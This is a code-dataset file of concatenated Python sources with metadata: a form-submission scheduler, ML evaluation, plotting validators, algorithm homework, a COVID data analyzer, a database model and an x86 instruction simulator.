return response.text\n\n# 接口\ndef run(account):\n session = login_account(account)\n submit_data(session)\n\ndef test():\n print('程序正常执行中!')\n\nif __name__ == '__main__':\n # run(account=account_data)\n # 设置定时任务\n account_data = {\n 'username': '',\n 'password': ''\n }\n # 填报时间\n chen_submit_time = \"06:01\"\n wu_submit_time = \"12:11\"\n wan_submit_time = \"18:41\"\n schedule.every().day.at(chen_submit_time).do(run, account_data)\n schedule.every().day.at(wu_submit_time).do(run, account_data)\n schedule.every().day.at(wan_submit_time).do(run, account_data)\n schedule.every(5).hours.do(test)\n print('程序正常执行中!')\n while True:\n # 运行所有可以运行的任务\n schedule.run_pending()","sub_path":"chenwujian_every_day.py","file_name":"chenwujian_every_day.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"120548766","text":"# camera-ready\n\nfrom datasets import ToyDatasetEvalKL # (this needs to be imported before torch, because cv2 needs to be imported before torch for some reason)\nfrom model import ToyNet\n\nimport torch\nimport torch.utils.data\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nimport numpy as np\nimport pickle\nimport matplotlib\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport cv2\n\nbatch_size = 32\n\nnum_samples = 2048\n\nmodel_id = \"2-kldis\"\nepoch = 75\nnum_models = 20\n\nepsilon = 1.0e-30\n\nwith open(\"/root/ebms_regression/1dregression/2/gt_x_values_2_scores.pkl\", \"rb\") as file: # (needed for python3)\n gt_x_values_2_scores = pickle.load(file)\n\nval_dataset = ToyDatasetEvalKL()\n\nnum_val_batches = int(len(val_dataset)/batch_size)\nprint (\"num_val_batches:\", num_val_batches)\n\nval_loader = torch.utils.data.DataLoader(dataset=val_dataset, batch_size=batch_size, shuffle=False)\n\ntorch.autograd.set_grad_enabled(False)\n\nKL_values = []\nfor model_i in range(num_models):\n network = ToyNet(model_id, project_dir=\"/root/ebms_regression/1dregression\").cuda()\n\n network.load_state_dict(torch.load(\"/root/ebms_regression/1dregression/training_logs/model_%s_%d/checkpoints/model_%s_epoch_%d.pth\" % (model_id, model_i, model_id, epoch)))\n\n x_values = []\n x_values_2_scores = {}\n network.eval() # (set in eval mode, this affects BatchNorm and dropout)\n for step, (x) in enumerate(val_loader):\n x = x.cuda().unsqueeze(1) # (shape: (batch_size, 1))\n\n y_samples = np.linspace(-3.0, 3.0, num_samples) # (shape: (num_samples, ))\n y_samples = y_samples.astype(np.float32)\n y_samples = torch.from_numpy(y_samples).cuda() # (shape: (batch_size, num_samples))\n\n x_features = network.feature_net(x)\n scores = network.predictor_net(x_features, y_samples.expand(x.shape[0], -1)) # (shape: (batch_size, num_samples))\n\n x_values.extend(x.squeeze(1).cpu().tolist())\n\n for i, x_val in enumerate(x):\n x_values_2_scores[x_val.item()] = scores[i,:].cpu().numpy()\n\n print (\"$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\")\n\n num_x_values = float(len(x_values))\n print (num_x_values)\n\n KL = 0.0\n for step, x_value in enumerate(x_values):\n scores = np.exp(x_values_2_scores[x_value].flatten()) # (shape: (num_samples, ))\n if np.sum(scores) > 1e-40:\n prob = scores/np.sum(scores) # (shape: (num_samples, ))\n else:\n scores = np.ones((num_samples, ))\n prob = scores/np.sum(scores)\n\n scores_gt = gt_x_values_2_scores[x_value].flatten() + epsilon # (shape: (num_samples, ))\n prob_gt = scores_gt/np.sum(scores_gt) # (shape: (num_samples, ))\n\n KL_i = np.sum(prob_gt*np.log(prob_gt/prob))\n KL = KL + KL_i/num_x_values\n\n print (\"KL: %g\" % KL)\n KL_values.append(KL)\n\n print (KL_values)\n print (\"KL: %g +/- %g\" % (np.mean(np.array(KL_values)), np.std(np.array(KL_values))))\n KL_values.sort()\n print (KL_values[0:5])\n print (\"KL top 5: %g +/- %g\" % (np.mean(np.array(KL_values[0:5])), np.std(np.array(KL_values[0:5]))))\n\n print (KL_values[0:10])\n print (\"KL top 10: %g +/- %g\" % (np.mean(np.array(KL_values[0:10])), np.std(np.array(KL_values[0:10]))))\n\n print (\"##################################################################\")\n","sub_path":"1dregression/2/kldis_eval.py","file_name":"kldis_eval.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"35836058","text":"import _plotly_utils.basevalidators\n\n\nclass LocationmodeValidator(_plotly_utils.basevalidators.EnumeratedValidator):\n\n def __init__(\n self, plotly_name='locationmode', parent_name='scattergeo', **kwargs\n ):\n super(LocationmodeValidator, self).__init__(\n plotly_name=plotly_name,\n parent_name=parent_name,\n edit_type='calc',\n role='info',\n values=['ISO-3', 'USA-states', 'country names'],\n **kwargs\n )\n","sub_path":"plotly/validators/scattergeo/_locationmode.py","file_name":"_locationmode.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"600853427","text":"\"\"\"Utility functions for `neurodocker.interfaces.tests`.\"\"\"\nfrom __future__ import absolute_import\n\nfrom neurodocker import Dockerfile, SpecsParser\nfrom neurodocker.docker import client, DockerContainer, DockerImage\n\ndef get_container_from_specs(specs, **kwargs):\n \"\"\"Return started container. `kwargs` are for `container.start()`.\"\"\"\n parser = SpecsParser(specs)\n df = Dockerfile(parser.specs)\n image = DockerImage(df).build(log_console=True)\n return DockerContainer(image).start(**kwargs)\n\ndef test_cleanup(container):\n container.cleanup()\n client.containers.prune()\n client.images.prune()\n","sub_path":"neurodocker/interfaces/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"333460175","text":"\n\"\"\"Randomized Selection Implementation\"\"\"\n\nfrom random import randint\n\n\ndef rselect(array, i):\n \"\"\"Rselect public method\"\"\"\n return _rselect(array, 0, len(array) - 1, i)\n\n\ndef _rselect(array, l, r, i):\n \"\"\"Divide and conquer step\"\"\"\n\n if l >= r:\n return array[r]\n\n pivot_index = partition(array, l, r)\n\n if pivot_index == i:\n return array[i]\n elif pivot_index > i:\n return _rselect(array, l, pivot_index - 1, i)\n else:\n return _rselect(array, pivot_index + 1, r, i)\n\n\ndef partition(array, l, r):\n \"\"\"Partition around pivot\"\"\"\n pivot_index = choose_pivot(array, l, r)\n pivot = array[pivot_index]\n\n i = l + 1\n j = l + 1\n while j <= r:\n if array[j] < pivot:\n swap(array, i, j)\n i += 1\n\n j += 1\n\n swap(array, l, i - 1)\n\n return i - 1\n\n\ndef choose_pivot(array, l, r):\n \"\"\"Choose pivot\"\"\"\n\n # Choose random pivot\n pivot_index = randint(l, r)\n\n # Make sure chosen pivot is on first slot (relative)\n swap(array, l, pivot_index)\n\n return l\n\n\ndef swap(array, i, j):\n \"\"\"Swap routine\"\"\"\n temp = array[i]\n array[i] = array[j]\n array[j] = temp\n","sub_path":"week4/rselect.py","file_name":"rselect.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"493090146","text":"import utilities as u\nimport pandas as pd\nimport sys\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass Analyzer:\n\n STATES = ['confirmed', 'death', 'recovered', 'current_infected']\n\n data = False\n include_country_regions = []\n exclude_country_regions = []\n include_province_states = []\n\n def __init__(self, confirmed, death, recovered, include_country_regions=[], exclude_country_regions=[], include_province_states=[]):\n self.include_country_regions = include_country_regions\n self.exclude_country_regions = exclude_country_regions\n self.include_province_states = include_province_states\n\n datasets_c = [self._clean_data(dataset)\n for dataset in [confirmed, death, recovered]]\n\n frame = {\n 'confirmed_total': datasets_c[0],\n 'death_total': datasets_c[1],\n 'recovered_total': datasets_c[2]}\n\n self.data = pd.DataFrame(frame)\n\n self.data['current_infected_total'] = self.data['confirmed_total'] - self.data['death_total'] - self.data['recovered_total']\n\n self._gen_change_data()\n self._gen_change_pct_data()\n self._gen_change_pct_avg_data()\n\n # self.data['confirmed_change%3a']\n\n self.data['lethality'] = self.data['death_total'] / self.data['recovered_total']\n\n def _gen_change_data(self):\n for state in self.STATES:\n self.data[state+'_change'] = self.data[state+'_total'].diff()\n\n def _gen_change_pct_data(self):\n for state in self.STATES:\n self.data[state+'_change%'] = self.data[state+'_total'].pct_change()\n\n def _gen_change_pct_avg_data(self, window=5):\n for state in self.STATES:\n self.data[state+'_change%'+str(window)+'a'] = self.data[state+'_change%'].rolling(window=window, min_periods=0).mean()\n\n def _clean_data(self, data):\n for country_region in self.exclude_country_regions:\n data = data[data['Country/Region'] != country_region]\n\n if len(self.include_country_regions) > 0:\n data = data[np.isin(data['Country/Region'], self.include_country_regions)]\n\n # TODO include_province_states filter\n\n data = data.drop(columns=['Province/State', 'Country/Region', 'Lat', 'Long'])\n data = data.aggregate('sum')\n data.index.name = 'date'\n data.index = pd.to_datetime(data.index)\n return data\n\n def get_dataframe(self):\n return self.data\n\n def graph_data(self, columns=[], since_x_days_ago=0, upto_x_days_ago=0):\n if len(columns) == 0:\n self.graph_totals(since_x_days_ago, upto_x_days_ago)\n else:\n for column in columns:\n plt.plot(self.data[column][-since_x_days_ago:len(self.data[column]) - upto_x_days_ago], label=column)\n plt.gcf().autofmt_xdate()\n plt.show()\n\n def graph_totals(self, since_x_days_ago=0, upto_x_days_ago=0):\n self.graph_append('_total', since_x_days_ago, upto_x_days_ago)\n\n def graph_changes(self, since_x_days_ago=0, upto_x_days_ago=0):\n self.graph_append('_change', since_x_days_ago, upto_x_days_ago)\n\n def graph_changes_pct(self, since_x_days_ago=0, upto_x_days_ago=0):\n self.graph_append('_change%', since_x_days_ago, upto_x_days_ago)\n\n def graph_changes_pct_avg(self, since_x_days_ago=0, upto_x_days_ago=0, window=5):\n self._gen_change_pct_avg_data(window)\n self.graph_append('_change%'+str(window)+'a', since_x_days_ago, upto_x_days_ago)\n\n def graph_append(self, append='', since_x_days_ago=0, upto_x_days_ago=0):\n since_x_days_ago = -since_x_days_ago\n upto_x_days_ago = len(self.data) - upto_x_days_ago\n plt.plot(self.data['death'+append][since_x_days_ago:upto_x_days_ago], color='red', label='death')\n plt.plot(self.data['current_infected'+append][since_x_days_ago:upto_x_days_ago], color='purple', label='current infected')\n plt.plot(self.data['confirmed'+append][since_x_days_ago:upto_x_days_ago], color='orange', linestyle='dashed', label='confirmed total')\n plt.plot(self.data['recovered'+append][since_x_days_ago:upto_x_days_ago], color='green', label='recovered')\n plt.gcf().autofmt_xdate()\n plt.show()\n\n\nclass DataDownloader:\n\n confirmed = False\n death = False\n recovered = False\n\n def __init__(self):\n if not (self.confirmed or self.death or self.recovered):\n self.confirmed, self.death, self.recovered = u.fetch_virus_data()\n\n def get_analyzer(self, include_country_regions=[], exclude_country_regions=[], include_province_states=[]):\n return Analyzer(\n self.confirmed,\n self.death,\n self.recovered,\n include_country_regions,\n exclude_country_regions,\n include_province_states\n )\n\n def display_countries(self):\n pd.options.display.max_rows = 1000\n displayed = []\n for country in self.confirmed['Country/Region']:\n if country not in displayed:\n print(country)\n displayed.append(country)\n\n def display_locations(self):\n pd.options.display.max_rows = 1000\n print(self.confirmed['Province/State', 'Country/Region'])\n\n","sub_path":"src/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":5247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"574001833","text":"\"\"\"Defines the Order class.\r\n\r\nIncludes constructor, representation return, and serialization formatting.\r\n\r\n\"\"\"\r\n\r\nimport datetime\r\n\r\nfrom flask import session\r\n\r\nfrom admin.app.models import db\r\nfrom admin.app.models.session_models.customer import CustomerSession as Customer\r\nfrom admin.app.models.session_models.sale import SaleSession as Sale\r\nfrom admin.app.models.session_models.product import ProductSession as Product\r\n\r\n\r\nclass OrderSession(db.Model):\r\n \"\"\"Order Class\"\"\"\r\n __tablename__ = \"order_session\"\r\n real_id = db.Column(db.Integer, primary_key=True)\r\n id = db.Column(db.Integer)\r\n sale_id = db.Column(db.Integer)\r\n customer_id = db.Column(db.Integer)\r\n timestamp_created = db.Column(db.DateTime)\r\n session_id = db.Column(db.Text)\r\n\r\n def __init__(\r\n self, sale_id, customer_id, timestamp_created=None,\r\n id=None, session_id=None):\r\n self.sale_id = sale_id\r\n self.customer_id = customer_id\r\n self.timestamp_created = (\r\n timestamp_created\r\n if timestamp_created is not None\r\n else datetime.datetime.utcnow()\r\n )\r\n self.id = id\r\n self.session_id = session_id\r\n\r\n def __repr__(self):\r\n return \"\".format(self.id)\r\n\r\n @property\r\n def serialize(self):\r\n \"\"\"Formats for JSON return.\r\n\r\n This requires data from the Customer, Sale, and Product models.\r\n\r\n \"\"\"\r\n customer_obj = db.session.query(\r\n Customer\r\n ).filter_by(\r\n id=self.customer_id,\r\n session_id=session.sid\r\n ).first()\r\n\r\n sale_obj = db.session.query(\r\n Sale\r\n ).filter_by(\r\n id=self.sale_id,\r\n session_id=session.sid\r\n ).first()\r\n\r\n product_obj = db.session.query(\r\n Product\r\n ).filter_by(\r\n id=sale_obj.product_id,\r\n session_id=session.sid\r\n ).first()\r\n\r\n return {\r\n \"id\": self.id,\r\n \"sale_id\": self.sale_id,\r\n \"sale_price\": str(sale_obj.price),\r\n \"sale_product\": product_obj.name,\r\n \"customer_id\": self.customer_id,\r\n \"customer_email\": customer_obj.email,\r\n \"timestamp_created\": self.timestamp_created\r\n }\r\n","sub_path":"app/models/session_models/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"257187032","text":"# 04 - Seja o statement sobre diversidade: \"The Python Software Foundation and the global\n# Python community welcome and encourage participation by everyone. Our community\n# is based on mutual respect, tolerance, and encouragement, and we are working\n# to help each other live up to these principles. We want our community to be more\n# diverse: whoever you are, and whatever your background, we welcome you.\".\n# Gere uma lista de palavras deste texto com split(), a seguir crie uma lista\n# com as palavras que começam ou terminam com uma das letras \"python\". Imprima\n# a lista resultante. Não se esqueça de remover antes os caracteres especiais\n# e cuidado com maiúsculas e minúsculas.\n\ntext = '''\n The Python Software Foundation and the global Python community welcome and encourage\n participation by everyone. Our community is based on mutual respect, tolerance, and\n encouragement, and we are working to help each other live up to these principles.\n We want our community to be more diverse: whoever you are, and whatever your\n background, we welcome you.\n'''\nfor special_character in ['\\n', '.', ':', ',']:\n text = text.replace(special_character, '')\nwords = text.split(' ')\nwords_selected = []\nfor word in words:\n match = ('p', 'y', 't', 'h', 'o', 'n')\n word_lower = word.lower()\n if word_lower.startswith(match) or word_lower.endswith(match):\n words_selected.append(word)\nprint(words_selected)\n\n","sub_path":"semestre-01/algoritmos-e-logica-de-programacao/lista-04/04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"65057415","text":"\n\"\"\" Problem Set 01 starter code\n\nPlease make sure your code runs on Python version 3.5.0\n\nDue date: 2016-02-05 13:00\n\nStudent: Lien Tran, Class of 2016\n\"\"\"\n\nimport numpy as np\nfrom scipy import spatial\nfrom scipy.stats import norm\nfrom sklearn.neighbors import NearestNeighbors\nimport time\n\ndef my_knn(X, y, k=1):\n \"\"\" Basic k-nearest neighbor functionality\n\n k-nearest neighbor regression for a numeric test\n matrix. Prediction are returned for the same data matrix\n used for training. For each row of the input, the k\n closest rows (using the l2 distance) in the training\n set are identified. The mean of the observations y\n is used for the predicted value of a new observation.\n\n Args:\n X: an n by p numpy array; the data matrix of predictors\n y: a length n numpy array; the observed response\n k: integer giving the number of neighbors to include\n\n Returns:\n a 1d numpy array of predicted responses for each row of the input matrix X\n \"\"\"\n\n distmat = spatial.distance.squareform(spatial.distance.pdist(X))\n pred = []\n for i, row in enumerate(distmat):\n print()\n print (row)\n ind = np.argpartition(row, k)[:k]\n y_index = [distmat[i][x] for x in ind]\n print(\"ind\", ind)\n print(\"y_index\", y_index)\n print(i)\n total = 0\n for elm in ind:\n print(y[elm])\n total += y[elm]\n pred.append(total/float(k))\n return pred \n \n # distmat = spatial.distance.pdist(X)\n # pred = []\n # n = len(X)\n # for i, ri in enumerate(X):\n # i_dist = []\n # # get all distances for element i\n # for j, rj in enumerate(X):\n # if i == j:\n # continue\n # i_dist.append((getDist(i, j, distmat, n), j))\n # dist_list = [x[0] for x in i_dist]\n # #print i_dist\n # j_list = [x[1] for x in i_dist]\n # # get k+1 indexes of k+1 smaller distances (including 0, itself)\n # k_part = min(k, n-2)\n # ind = np.argpartition(dist_list, k_part)[:k]\n # # getting corresponding j's\n # y_index = [j_list[x] for x in ind]\n # total = 0\n # #print y_index\n # for elm in y_index:\n # total += y[elm]\n # pred.append(total/float(k))\n # return pred \n\n# def getDist(i, j, distmat, n):\n# # x < y\n# if i < j:\n# x = i\n# y = j\n# else:\n# x = j\n# y = i\n# if x == 0:\n# return distmat[y-1]\n# else:\n# return distmat[n*x -(x*((x+1)/2.0)) + y-x-1]\n\n\ndef my_ksmooth(X, y, sigma=1.0):\n \"\"\" Kernel smoothing function\n\n kernel smoother for a numeric test matrix with a Gaussian\n kernel. Prediction are returned for the same data matrix\n used for training. For each row of the input, a weighted\n average of the input y is used for prediction. The weights\n are given by the density of the normal distribution for\n the distance of a training point to the input.\n\n Args:\n X: an n by p numpy array; the data matrix of predictors\n y: a length n numpy vector; the observed response\n sigma: the standard deviation of the normal density function\n used for the weighting scheme\n\n Returns:\n a 1d numpy array of predicted responses for each row of the input matrix X\n \"\"\"\n\n distmat = spatial.distance.squareform(spatial.distance.pdist(X))\n pred = []\n for i, row in enumerate(X):\n total = 0.0\n numerator = 0.0\n denominator = 0.0\n for j, elm in enumerate(X):\n p = norm(scale=sigma).pdf((distmat[i][j])**2)\n numerator += y[j]*p\n denominator += p\n total = numerator/denominator\n print(total)\n pred.append(total)\n return pred\n\n # distmat = spatial.distance.pdist(X)\n # pred = []\n # n = len(X)\n # for i, ri in enumerate(X):\n # i_dist = []\n # # get all distances for element i\n # for j, rj in enumerate(X):\n # if i == j:\n # continue\n # i_dist.append((getDist(i, j, distmat, n), j))\n # # getting corresponding j's\n # total = 0\n # for elm in i_dist:\n # total += y[elm[1]]*norm(scale=sigma).pdf(elm[0])\n # pred.append(total/float(n))\n # return pred\n\n\n# X = [[1,2,3,4,5],[6,7,8,9,0],[1,4,67,3,5],[11,22,3,0,4]]\n# d = spatial.distance.pdist(X)\n# print d\n# print getDist(0, 1, d, 4)\n# print getDist(0, 2, d, 4)\n# print getDist(0, 3, d, 4)\n# print getDist(1, 2, d, 4)\n# print getDist(1, 3, d, 4)\n# print getDist(2, 3, d, 4)\n# print\n\n# X1 = [[1,2,3,4,5],[6,7,8,9,0]]\n# X2 = [[1,2,3,4,5],[1,4,67,3,5]]\n# X3 = [[1,2,3,4,5], [11,22,3,0,4]]\n# X4 = [[6,7,8,9,0], [1,4,67,3,5]]\n# X5 = [[6,7,8,9,0], [11,22,3,0,4]]\n# X6 = [[1,4,67,3,5],[11,22,3,0,4]]\n# print spatial.distance.pdist(X1)\n# print spatial.distance.pdist(X2)\n# print spatial.distance.pdist(X3)\n# print spatial.distance.pdist(X4)\n# print spatial.distance.pdist(X5)\n# print spatial.distance.pdist(X6)\n\n# y = [3,5,2,4]\n\n# start = time.clock()\n\n#print my_knn(X, y, 2)\n# print my_ksmooth(X, y, 1)\n\n# elapsed = time.clock() - start\n# print(\"Run time is \", elapsed)\n# print\n# print(\"running scipy's knn\")\n# start = time.clock()\n# X_ = np.array([[1,2,3,4,5],[6,7,8,9,0],[1,4,67,3,5],[11,22,3,0,4]])\n# nbrs = NearestNeighbors(n_neighbors=2, algorithm='ball_tree').fit(X)\n# distances, indices = nbrs.kneighbors(X)\n# print indices\n# print distances\n# elapsed = time.clock() -start\n# print(\"Run time is \", elapsed)\n#print(my_knn(np.matrix([[0,2],[0,4],[0,7],[0,8],[0,8],[0,9]]),[1,2,3,4,5,6],k=3))\n# print(my_ksmooth(np.matrix([[0,2],[0,4],[0,7],[0,8],[0,8],[0,9]]),np.array([1,2,3,4,5,6])))\n\n\n","sub_path":"Pset1/llt23_pset01/pset01.py","file_name":"pset01.py","file_ext":"py","file_size_in_byte":5518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"646183445","text":"'''\n손님들을 초대하여 파티를 계획하는 아이유는 가장 먼저 과일을 종류별로 일정한\n갯수만큼씩 준비하려고 한다. 과일 리스트 중 집에 있는 과일과 추가로 준비할 과일의\n리스트를 data.txt 파일과 같이 작성해 보았다. 과일 당 최소 5개씩 준비하려고 하며\n과일의 1개당 가격을 조사하였습니다. 5개 이하인 과일은 5개가 되도록 사려고 할 때,\n사야할 과일과 그에 드는 각각의 비용과 총비용을 출력하는 프로그램을 작성하시오.\n\n<샘플 예>\n과일명 가격 개수 \n 사과 1500 5\n 메론 2200 2 \n 참외 1300 5\n 수박 9000 3\n 포도 4500 4\n 망고 1990 3\n 금귤 1100 1\n\n<실행 예>\n\n추가 구매 과일 리스트, 갯수 및 소요비용\n 메론 3개 6600원\n 수박 2개 18000원\n 포도 1개 4500원\n 망고 2개 3980원\n 금귤 4개 4400원\n\n총 구매 소요 비용 37480\n\n'''\nfrom fruitPurchase_sub import fruitPurchase\n\n\nfp = open('data.txt', 'r', encoding='utf-8')\nstrList = fp.read().splitlines()\nfp.close()\n\n\nfruitDics = {}\n\nfor fruit in strList:\n dataList = fruit.split()\n fruitDics[dataList[0]] = list(map(int, dataList[1:])) # 주의!!!! 파일에서 읽어온 모든 데이터는 문자이다\n \n \nresDics, total = fruitPurchase(fruitDics)\n\nprint(\"추가 구매 과일 리스트, 갯수 및 소요비용\")\n\nfor item in resDics:\n print(\"{:>6}\".format(item), end=' ')\n print(\"{:3d}개\".format(resDics[item][0]), end=' ')\n print(\"{:10d}원\".format(resDics[item][1]))\nprint(\"\\n총 구매 소요 비용 %d\" % total)\n\n","sub_path":"Python_Practice/Python실습-김도연/제공/Mission3/종합실습5_과일구매/fruitPurchase_main.py","file_name":"fruitPurchase_main.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"468051974","text":"# ------------------------------------------------------------------------------\n# Access to the CodeHawk Binary Analyzer Analysis Results\n# Author: Henny Sipma\n# ------------------------------------------------------------------------------\n# The MIT License (MIT)\n#\n# Copyright (c) 2016-2020 Kestrel Technology LLC\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n# ------------------------------------------------------------------------------\n\nimport chb.asm.X86OpcodeBase as X\nimport chb.simulate.SimulationState as S\nimport chb.simulate.SimUtil as SU\nimport chb.simulate.SimValue as SV\n\nclass X86ShiftLeft(X.X86OpcodeBase):\n\n # tags: [ 'shl' ]\n # args: [ dst-op, src-op ]\n def __init__(self,x86d,index,tags,args):\n X.X86OpcodeBase.__init__(self,x86d,index,tags,args)\n\n def get_dst_operand(self): return self.x86d.get_operand(self.args[0])\n\n def get_src_operand(self): return self.x86d.get_operand(self.args[1])\n\n def get_operands(self):\n return [ self.get_dst_operand(), self.get_src_operand() ]\n\n # xdata: [ \"a:vxxxx\": lhs, rhsbase, rhs-expr, rhs-result, rhs-result-simplified ]\n def get_annotation(self,xdata):\n (xtags,xargs,xprs) = xdata.get_xprdata()\n if len(xprs) == 5:\n lhs = str(xprs[0])\n rhs = str(xprs[3])\n rrhs = str(xprs[4])\n rrhs = X.simplify_result(xargs[3],xargs[4],rhs,rrhs)\n return lhs + ' = ' + rrhs\n else:\n return (self.tags[0] + ':????')\n\n def get_lhs(self,xdata):\n (xtags,xargs,xprs) = xdata.get_xprdata()\n if len(xprs) == 5: return [ xprs[0] ]\n else: return []\n\n def get_rhs(self,xdata):\n (xtags,xargs,xprs) = xdata.get_xprdata()\n if len(xprs) == 5: return [ xprs[2] ]\n else: return []\n\n # --------------------------------------------------------------------------\n # Shifts the bits in the first operand (destination operand) to the left by\n # the number of bits specified in the second operand (count operand).\n # The count operand can be an immediate value or the CL register. The count\n # is masked to 5 bits. Bits shifted beyond the destination operand boundary\n # are first shifted into the CF flag, then discarded. At the end of the shift\n # operation, the CF flag contains the last bit shifted out of the\n # destination operand. For each shift count, the most significant bit of the\n # destination operand is shifted into the CF flag, and the least significant\n # bit is cleared.\n #\n # The OF flag is affected only on 1-bit shifts. The OF flag is set to 0 if\n # the most-significant bit of the result is the same as the CF flag (that\n # is, the top two bits of the original operand were the same); otherwise,\n # it is set to 1.\n #\n # Flags affected:\n # The CF flag contains the value of the last bit shifted out of the\n # destination operand; it is undefined for SHL instructions where\n # the count is greater than or equal to the size (in bits) of the destination\n # operand. The OF flag is affected only for 1-bit shifts; otherwise, it is\n # undefined. The SF, ZF, and PF flags are set according to the result. If the\n # count is 0, the flags are not affected. For a non- zero count, the AF flag\n # is undefined.\n # --------------------------------------------------------------------------\n def simulate(self,iaddr,simstate):\n srcop = self.get_src_operand()\n dstop = self.get_dst_operand()\n srcval = simstate.get_rhs(iaddr,srcop)\n dstval = simstate.get_rhs(iaddr,dstop)\n (cflag,result) = dstval.bitwise_shl(srcval)\n simstate.set(iaddr,dstop,result)\n if srcval.value > 0:\n simstate.update_flag('CF',cflag)\n if srcval.value == 1:\n msb = result.get_msb()\n if not (msb == cflag):\n simstate.clear_flag('OF')\n else:\n simstate.set_flag('OF')\n else:\n simstate.undefine_flag('OF')\n simstate.update_flag('CF',cflag)\n simstate.update_flag('SF',result.is_negative())\n simstate.update_flag('ZF',result.is_zero())\n simstate.update_flag('PF',result.is_odd_parity())\n","sub_path":"chb/asm/bitwise/X86ShiftLeft.py","file_name":"X86ShiftLeft.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"64806038","text":"'''\nFind and list all four-digit numbers in decimal notation that have the property that the sum of\ntheir four digits equals the sum of their digits when represented in hexadecimal (base 16) notation\nand also equals the sum of their digits when represented in duodecimal (base 12) notation.\nFor example, the number 2991 has the sum of (decimal) digits 2 + 9 + 9 + 1 = 21. Since 299\n1 = 1*1728 + 8*144 + 9*12 + 3, its duodecimal representation is 1893, and these digits also sum\nup to 21. But in hexadecimal, 2991 is BAF16, and 11 + 10 + 15 = 36, so 2991 should be rejected\nby your program.\nThe next number (2992), however, has digits that sum to 22 in all three representations (including\nBB016), so 2992 should be on the listed output. (We don’t want decimal numbers with fewer\nthan four digits—excluding leading zeros—so that 2992 is the first correct answer.)\n\ninput : an integer number\noutput : consecutive specialized four_digit number counted for input\n\n'''\nfrom sys import stdin, stdout\n\nimport string\ndef int2base(integer, base):\n if not integer: return '0'\n sign = 1 if integer > 0 else -1\n alphanum = string.digits + string.ascii_lowercase\n nums = alphanum[:base]\n res = ''\n integer *= sign\n while integer:\n integer, mod = divmod(integer, base)\n res += nums[mod]\n return ('' if sign == 1 else '-') + res[::-1]\nconv = {\"0\":0, \"1\":1, \"2\":2,\"3\":3, \"4\":4,\"5\":5,\"6\":6,\"7\":7,\"8\":8,\"9\":9,\"a\":10,\"b\":11,\"c\":12,\"d\":13,\"e\":14,\"f\":15}\ndef sum_digits(n):\n ns = str(n)\n while (len(ns)>2):\n n = sum([conv[x] for x in ns])\n ns = str(n)\n return ns\n\n#print(int2base(2991, 12))\n#print(sum_digits(1893))\n\ncnt = int(stdin.readline())\nstart = 2990\ndone = 0\nwhile done < cnt:\n start += 1\n a = sum_digits(start)\n b = sum_digits(int2base(start, 12))\n c = sum_digits(int2base(start, 16))\n if a == b == c:\n print(start)\n done += 1\n\n\n\n\n\n\n","sub_path":"Old_online_judges/specialized_four_digit_number.py","file_name":"specialized_four_digit_number.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"57506286","text":"'''\nTest program 1\nauthor James Heliotis\n'''\n\nfrom ticket_booth import Ticket, SecurityBreach\nfrom protection import privilege, main_program, log\n\n@privilege( Ticket.ADMIN )\n@log\ndef admin_only( tag, x, y ):\n return x + y\n\n@log\n@privilege( Ticket.MANAGER )\ndef mgr_admin( tag, q ):\n print( \"Quota set to\", q )\n\n@log\n@privilege( Ticket.USER )\ndef anyone( tag, name ):\n return \"Hello, \" + name\n\nJAMES = \"James\"\nMOHAN = \"Mohan\"\nLINUS = \"Linus\"\n\n@main_program( \"log1.txt\" )\ndef test1():\n tickets = dict()\n tickets[ JAMES ] = Ticket( 6 );\n tickets[ MOHAN ] = Ticket( 106 );\n tickets[ LINUS ] = 